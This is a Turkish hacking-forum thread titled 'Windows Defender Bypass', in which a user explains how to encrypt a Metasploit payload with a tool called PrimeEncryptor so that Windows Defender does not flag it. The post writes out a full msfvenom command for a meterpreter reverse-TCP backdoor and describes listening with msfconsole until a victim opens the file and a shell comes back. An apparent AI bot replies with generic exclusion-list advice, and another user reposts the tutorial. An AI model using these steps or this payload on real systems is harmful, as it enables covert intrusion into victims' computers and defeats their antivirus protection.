Hoşgeldin Misafir

Windows Defender Bypass

zanzibar

22 Ağu 2025
17 Mesaj

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
Merhaba, PrimeEncryptor aracını kullanarak Windows Defender'ı nasıl aşabileceğinizi göstereceğim.
Öncelikle aracı sanal makinemize kuralım.



Dosyanın içerisine girerek CodeSnippets içerisindeki AES dosyasını PrimeEncryptor'a kopyalıyoruz.
Daha sonra MsfVenom aracını kullanarak bir arka kapı dosyası oluşturuyoruz.
Payload üretmek için kullanılan komut ---> msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=<LOCAL HOST> LPORT=4444 -f raw > payload.bin
AES.cpp dosyasında bazı değişiklikler yapmamız gerekiyor, bu yüzden dosyayı açıp değişiklikleri yapıyoruz.

İlk yorum kısmını silin ve altındaki diğer yorum kısmını yorumdan kaldırın.


ilk bölüm (bölümü sil)


Daha sonra Kaydedip Çıkın.
Python kodunu çalıştırdığımızda açılan kodda bize verilen kodları çalıştıralım.




Çerçevelediğimiz yeri kopyalayıp terminale yapıştırıyoruz.



ip ve portu dinlemek için msfconsol kullanıcaz.





Hedef sistemdeki kişi dosyamızı açtığı zaman, shell bize geliyor.





Windows Defender tehdit hakkında herhangi bir uyarı vermez. Bu şekilde Windows Defender'ı atlatırız



KONU SİZE FAYDALI OLDUYSA BEĞENEREK DESTEĞİNİZİ SUNABİLİRSİNİZ... TEŞEKKÜRLER.
 

THS-AI

THS-AI

THS YAPAY ZEKA
Turkhacks Kurumsal
20 Haz 2025
11,255 Mesaj

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
Windows Defender'ı geçmek için, şüpheli dosyaları veya işlemleri güvenilirliğini doğruladıktan sonra istisna listesine ekleyebilirsiniz. Ayrıca, güncel antivirüs veritabanını kullanmak ve sisteminizi temiz tutmak önemli. Yasal ve etik kurallara uygun hareket edin.
 

Kyron

15 Ağu 2025
1 Mesaj

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
Merhaba, PrimeEncryptor aracını kullanarak Windows Defender'ı nasıl aşabileceğinizi göstereceğim.
Öncelikle aracı sanal makinemize kuralım.

*** Gizli metin: alıntı yapılamaz. ***



Dosyanın içerisine girerek CodeSnippets içerisindeki AES dosyasını PrimeEncryptor'a kopyalıyoruz.
*** Gizli metin: alıntı yapılamaz. ***

Daha sonra MsfVenom aracını kullanarak bir arka kapı dosyası oluşturuyoruz.
*** Gizli metin: alıntı yapılamaz. ***

Payload üretmek için kullanılan komut ---> msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=<LOCAL HOST> LPORT=4444 -f raw > payload.bin
*** Gizli metin: alıntı yapılamaz. ***

AES.cpp dosyasında bazı değişiklikler yapmamız gerekiyor, bu yüzden dosyayı açıp değişiklikleri yapıyoruz.

İlk yorum kısmını silin ve altındaki diğer yorum kısmını yorumdan kaldırın.


*** Gizli metin: alıntı yapılamaz. ***

ilk bölüm (bölümü sil)
*** Gizli metin: alıntı yapılamaz. ***



Daha sonra Kaydedip Çıkın.
Python kodunu çalıştırdığımızda açılan kodda bize verilen kodları çalıştıralım.


*** Gizli metin: alıntı yapılamaz. ***



Çerçevelediğimiz yeri kopyalayıp terminale yapıştırıyoruz.

*** Gizli metin: alıntı yapılamaz. ***



ip ve portu dinlemek için msfconsol kullanıcaz.


*** Gizli metin: alıntı yapılamaz. ***




Hedef sistemdeki kişi dosyamızı açtığı zaman, shell bize geliyor.


*** Gizli metin: alıntı yapılamaz. ***




Windows Defender tehdit hakkında herhangi bir uyarı vermez. Bu şekilde Windows Defender'ı atlatırız

*** Gizli metin: alıntı yapılamaz. ***



KONU SİZE FAYDALI OLDUYSA BEĞENEREK DESTEĞİNİZİ SUNABİLİRSİNİZ... TEŞEKKÜRLER.
Eline saglık